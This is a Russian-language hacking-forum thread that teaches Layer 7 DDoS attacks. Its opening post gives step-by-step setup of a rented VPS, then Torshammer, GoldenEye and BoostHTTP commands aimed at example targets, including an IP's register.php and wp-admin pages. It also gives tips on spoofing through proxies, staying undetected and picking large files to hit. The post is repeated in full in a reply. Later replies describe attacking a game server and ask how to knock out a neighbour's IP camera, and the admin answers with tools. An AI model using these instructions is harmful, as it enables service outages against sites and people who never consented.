• В этом разделе невозможно создать тему привычным способом. Создать тему в этом разделе можно только через "Ресурсы".

Актуально Обучение DDoS атакам

AnGel

Команда форума
Регистрация
27 Авг 2015
Сообщения
3.195
Симпатии
2.105
Время онлайн
4дн 12ч 54м 39с
И так здравствуйте. Сегодня я раскрою миф о Layer7 ддос атаках, http протокола. Есть атаки с ботнетов а есть с серверов со спуфом.
Что такое спуф? Это когда 1 сервер отсылает запросы с направлением на удаленный веб-сервер (не факт что веб) через определенное количество прокси серверов, которые отсылают уже забрасывают пакеты на конечную точку (сервер который вы атакуете) полуоткрытыми соединения "tcp-syn атаки".
На самом деле что бы положить сайт никакой мощности и не требуется, просто знания выявления уязвимостей и правильность использования протоколов и приложения веб-сервера (Apache2, NGINX).
Для того что бы атаковать без-палевно, возьмите за 350 рублей сервер VPS с хорошей сетью. Советую брать тут, ибо им глубоко наплевать чем вы занимаетесь на сервере. Новинка: Ультрабыстрые SSD VPS в США - Inferno Solutions - Корзина
Нет нет - это не пиар хостинга, они всем ддосерам известны как торговцы и реселлеры серверов. Для начала VPS за 5$ вам в полне должно хватить, можете воспользоваться VPS серверами с тестовым периодом, но я советую брать сразу такой.

Далее укажите в запросе что бы вам поставили ОС Debian или Ubuntu. После получения доступов к серверу - скачиваем PUTTY (программа для удаленного управления Linux серверов)

Вписываете ИП, логин - root и пароль который вам выслали на почту.

Перед вами черный терминал: и так приступим!

Вписываем команды:
Код:
apt-get update
apt-get install python python3
pip install python-lib
apt-get install perl
apt-get upgrade
Далее скачиваем мой архив со скриптами ddos_tools.zip, в нем 3 скрипта под Layer7 атаки на вебсерверы методами get/post/head/
Рассмотрим первый ( Torshammer )
распаковываем все архивы в папке root и в терминале прописываем
Код:
chmod -R 777 /root
И кстати что бы залить архив и распаковать его - надо воспользоваться программой Filezilla или Winscp - так же вписывайте IP+ root + пароль.

Далее команды:
Код:
apt-get install unzip
unzip ddos_tools.zip
После того как мы выдали права на root папку, заходим в папку torshammer :
Код:
cd /root/torshammer
Запускаем атаку на сайт который хотите атаковать :
Код:
./torshammer.py www.example.com -r 400
Этот скрипт вызывает полуоткрытые tcp соединения с 1 и тогоже ип адреса вашего сервера, соединение несет низкий ttl так что эту атаку многие легко смогут заблокировать если додумаются.

Вторая атака (GET/POST методы)
Код:
cd /GoldenEye
./goldeneye.py http://www.example.com/ -w 50 -s 5000 -m get -d
Так же можем атаковать POST методом например по PHP скриптам сайта ( регистрации аккаунтов) или по WordPress
Код:
./goldeneye.py http://91.134.200.189/register.php/ -w 50 -s 600 -m post
./goldeneye.py http://91.134.200.189/wp-admin/ -w 50 -s 600 -m post
http://91.134.200.189/ и www.example.com - это пример сайтов которые мы атакуем как и по домену так и по IP адресу.

А теперь самая сильная атака из всех что я знаю для атаки сайтов под спуфы BoostHTTP

Она используется на 99% стрессорах и вызывает разрушительные ошибки приложения веб-серверов IIS, Apache2 и даже NGINX! Спуф атака про которую я говорил, равносильна атаке с ботнета в зависимости от количества ИП адесов в списке файла proxy.txt

Код:
cd /boosthttp
python BoosTHTTPv3.0.py
И следуйте примеру - укажите адрес и порт.
Так же я добавил свежие прокси листы для спуфа. Можете закупаться прокси листами, результатом вы останетесь довольнына все 100%.

Эти методы на 100% рабочие, все зависит от ваших рук и сайтов,также эти скрипты с открытым кодом и вы можете менять методы атак и структуры отправки пакетов на атакуемый сервер.
Еще хотел подметить что если запускать атаку по файлам большего размера чем главная страница сайта index, например на сайте есть тяжелое видео или картинка или архив,то атака будет в 2-10 раз производительнее. Ведь 95% хостеров даже не знают как защищать сеть от http флуда.

Удачи всем кто хочет изучать сеть , для тех кто хочет защищать веб серверы, я создам отдельную тему если вам понравилось.

Вечная ссылка во вложениях.
Пароль на архив: dark-time.life

 

Вложения:

Kanternp

Новорег
Регистрация
7 Ноя 2017
Сообщения
1
Симпатии
0
Время онлайн
0
Отличное начало обучения)
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

leonukv

Новорег
Регистрация
26 Фев 2017
Сообщения
48
Симпатии
21
Время онлайн
0
И так здравствуйте. Сегодня я раскрою миф о Layer7 ддос атаках, http протокола. Есть атаки с ботнетов а есть с серверов со спуфом.
Что такое спуф? Это когда 1 сервер отсылает запросы с направлением на удаленный веб-сервер (не факт что веб) через определенное количество прокси серверов, которые отсылают уже забрасывают пакеты на конечную точку (сервер который вы атакуете) полуоткрытыми соединения "tcp-syn атаки".
На самом деле что бы положить сайт никакой мощности и не требуется, просто знания выявления уязвимостей и правильность использования протоколов и приложения веб-сервера (Apache2, NGINX).
Для того что бы атаковать без-палевно, возьмите за 350 рублей сервер VPS с хорошей сетью. Советую брать тут, ибо им глубоко наплевать чем вы занимаетесь на сервере. Новинка: Ультрабыстрые SSD VPS в США - Inferno Solutions - Корзина
Нет нет - это не пиар хостинга, они всем ддосерам известны как торговцы и реселлеры серверов. Для начала VPS за 5$ вам в полне должно хватить, можете воспользоваться VPS серверами с тестовым периодом, но я советую брать сразу такой.

Далее укажите в запросе что бы вам поставили ОС Debian или Ubuntu. После получения доступов к серверу - скачиваем PUTTY (программа для удаленного управления Linux серверов)

Вписываете ИП, логин - root и пароль который вам выслали на почту.

Перед вами черный терминал: и так приступим!

Вписываем команды:
Код:
apt-get update
apt-get install python python3
pip install python-lib
apt-get install perl
apt-get upgrade
Далее скачиваем мой архив со скриптами ddos_tools.zip, в нем 3 скрипта под Layer7 атаки на вебсерверы методами get/post/head/
Рассмотрим первый ( Torshammer )
распаковываем все архивы в папке root и в терминале прописываем
Код:
chmod -R 777 /root
И кстати что бы залить архив и распаковать его - надо воспользоваться программой Filezilla или Winscp - так же вписывайте IP+ root + пароль.

Далее команды:
Код:
apt-get install unzip
unzip ddos_tools.zip
После того как мы выдали права на root папку, заходим в папку torshammer :
Код:
cd /root/torshammer
Запускаем атаку на сайт который хотите атаковать :
Код:
./torshammer.py www.example.com -r 400
Этот скрипт вызывает полуоткрытые tcp соединения с 1 и тогоже ип адреса вашего сервера, соединение несет низкий ttl так что эту атаку многие легко смогут заблокировать если додумаются.

Вторая атака (GET/POST методы)
Код:
cd /GoldenEye
./goldeneye.py http://www.example.com/ -w 50 -s 5000 -m get -d
Так же можем атаковать POST методом например по PHP скриптам сайта ( регистрации аккаунтов) или по WordPress
Код:
./goldeneye.py http://91.134.200.189/register.php/ -w 50 -s 600 -m post
./goldeneye.py http://91.134.200.189/wp-admin/ -w 50 -s 600 -m post
FreshCraft > Покупка привилегий и www.example.com - это пример сайтов которые мы атакуем как и по домену так и по IP адресу.

А теперь самая сильная атака из всех что я знаю для атаки сайтов под спуфы BoostHTTP

Она используется на 99% стрессорах и вызывает разрушительные ошибки приложения веб-серверов IIS, Apache2 и даже NGINX! Спуф атака про которую я говорил, равносильна атаке с ботнета в зависимости от количества ИП адесов в списке файла proxy.txt

Код:
cd /boosthttp
python BoosTHTTPv3.0.py
И следуйте примеру - укажите адрес и порт.
Так же я добавил свежие прокси листы для спуфа. Можете закупаться прокси листами, результатом вы останетесь довольнына все 100%.

Эти методы на 100% рабочие, все зависит от ваших рук и сайтов,также эти скрипты с открытым кодом и вы можете менять методы атак и структуры отправки пакетов на атакуемый сервер.
Еще хотел подметить что если запускать атаку по файлам большего размера чем главная страница сайта index, например на сайте есть тяжелое видео или картинка или архив,то атака будет в 2-10 раз производительнее. Ведь 95% хостеров даже не знают как защищать сеть от http флуда.

Удачи всем кто хочет изучать сеть , для тех кто хочет защищать веб серверы, я создам отдельную тему если вам понравилось.

Вечная ссылка во вложениях.
Пароль на архив: dark-time.life
Спасибо за годноту , ты реально ангел.
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

Pitt64

Новорег
Регистрация
17 Ноя 2015
Сообщения
22
Симпатии
8
Время онлайн
6м 7с
Весьма полезно. Черт, как ставить симпатии? Что-то не найду никак:с
 

bubuka55

Новорег
Регистрация
23 Ноя 2017
Сообщения
10
Симпатии
0
Время онлайн
0
А вот эти скрипты так же использовать?
https://dark-time.life/threads/22247/
P.S
vds который ты посоветовал там максимум канал 1gbps это мало.. выдел есть 10 gbps вот это уже куда не шло парочку таких снял и всё..
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

bubuka55

Новорег
Регистрация
23 Ноя 2017
Сообщения
10
Симпатии
0
Время онлайн
0
Фигня,попробывал снять на Inferno Solutions - Портал vps сервер, не много подосил сервак кс и на почту пришло вот такое письмо.

"Здравствуйте, мы получили жалобу на ваш сервер. Пожалуйста, решите проблему в течении 24 часов и сообщите нам ответом на это письма о принятых мерах, чтобы избежать блокировки сервера."

Вот так вот этот хостинг не годится для таких дел.
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

bubuka55

Новорег
Регистрация
23 Ноя 2017
Сообщения
10
Симпатии
0
Время онлайн
0
Тема больше не актуальна!
 

Вложения:

  • File size
    40,9 KB
    Просмотры
    194
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

Likey

Новорег
Регистрация
28 Авг 2017
Сообщения
26
Симпатии
9
Время онлайн
0
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

Likey

Новорег
Регистрация
28 Авг 2017
Сообщения
26
Симпатии
9
Время онлайн
0
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

bubuka55

Новорег
Регистрация
23 Ноя 2017
Сообщения
10
Симпатии
0
Время онлайн
0
Что взять? я купил хост только использовал другие скрипты... udp script на perl вот только там ни как прокси не заюзать на vps с этим скриптом...
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

bubuka55

Новорег
Регистрация
23 Ноя 2017
Сообщения
10
Симпатии
0
Время онлайн
0
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

Likey

Новорег
Регистрация
28 Авг 2017
Сообщения
26
Симпатии
9
Время онлайн
0
И прежде чем писать тут чушь скрины посмотри что vps был куплен и получен бан за ддос,кулцхакер бл*
То есть одноклеточным абузоустойчивый хост не предлагать ? Для теста тебе жалко потратить 4 бакса ? Ор.
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

bubuka55

Новорег
Регистрация
23 Ноя 2017
Сообщения
10
Симпатии
0
Время онлайн
0
То есть одноклеточным абузоустойчивый хост не предлагать ? Для теста тебе жалко потратить 4 бакса ? Ор.
Омг,ты вообще о чём? я еще раз говорю купил vps на inferno за 5$! и получил бан за исходящий траффик!они сами написали что мой сервер якобы мешает другим соседним серверам что я отжираю у них весь исходящий траффик и дали бан! какая тут абуза?
Если знаеш где разрешён флуд на vps просвети неуча :)
Inferno.PNG
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

Likey

Новорег
Регистрация
28 Авг 2017
Сообщения
26
Симпатии
9
Время онлайн
0
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

bubuka55

Новорег
Регистрация
23 Ноя 2017
Сообщения
10
Симпатии
0
Время онлайн
0
гугл я знаю:),но здесь речь в теме шла что админам инферно на всё плевать твори что душе угодно =)

P.S

Где достать сорцы для скана DNS серверов не знаеш?
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.
Последнее редактирование:
Регистрация
29 Окт 2017
Сообщения
1
Симпатии
0
Время онлайн
0
Спасибо
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

PAB

Новорег
Регистрация
29 Май 2018
Сообщения
4
Симпатии
2
Время онлайн
44м 9с
Скажите чем можно положить IP камеру...?
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.

AnGel

Команда форума
Регистрация
27 Авг 2015
Сообщения
3.195
Симпатии
2.105
Время онлайн
4дн 12ч 54м 39с
PAB, loic если ваш канал превышает канал камеры и нет фильтрации трафика. 100% вариант - стрессер платный.
 

PAB

Новорег
Регистрация
29 Май 2018
Сообщения
4
Симпатии
2
Время онлайн
44м 9с
Неее.... эта камера соседа...)))
 
Данный пользователь недостаточно провел времени на форуме! Работа с ним может быть не безопасна!
Для снятия данного предупреждения необходимо достичь группы "Пользователь" или ее приобрести. Группы "VIP" и "Продавец" не имеют данного предупреждения.
Чтобы приобрести группу — напишите администратору.
Сверху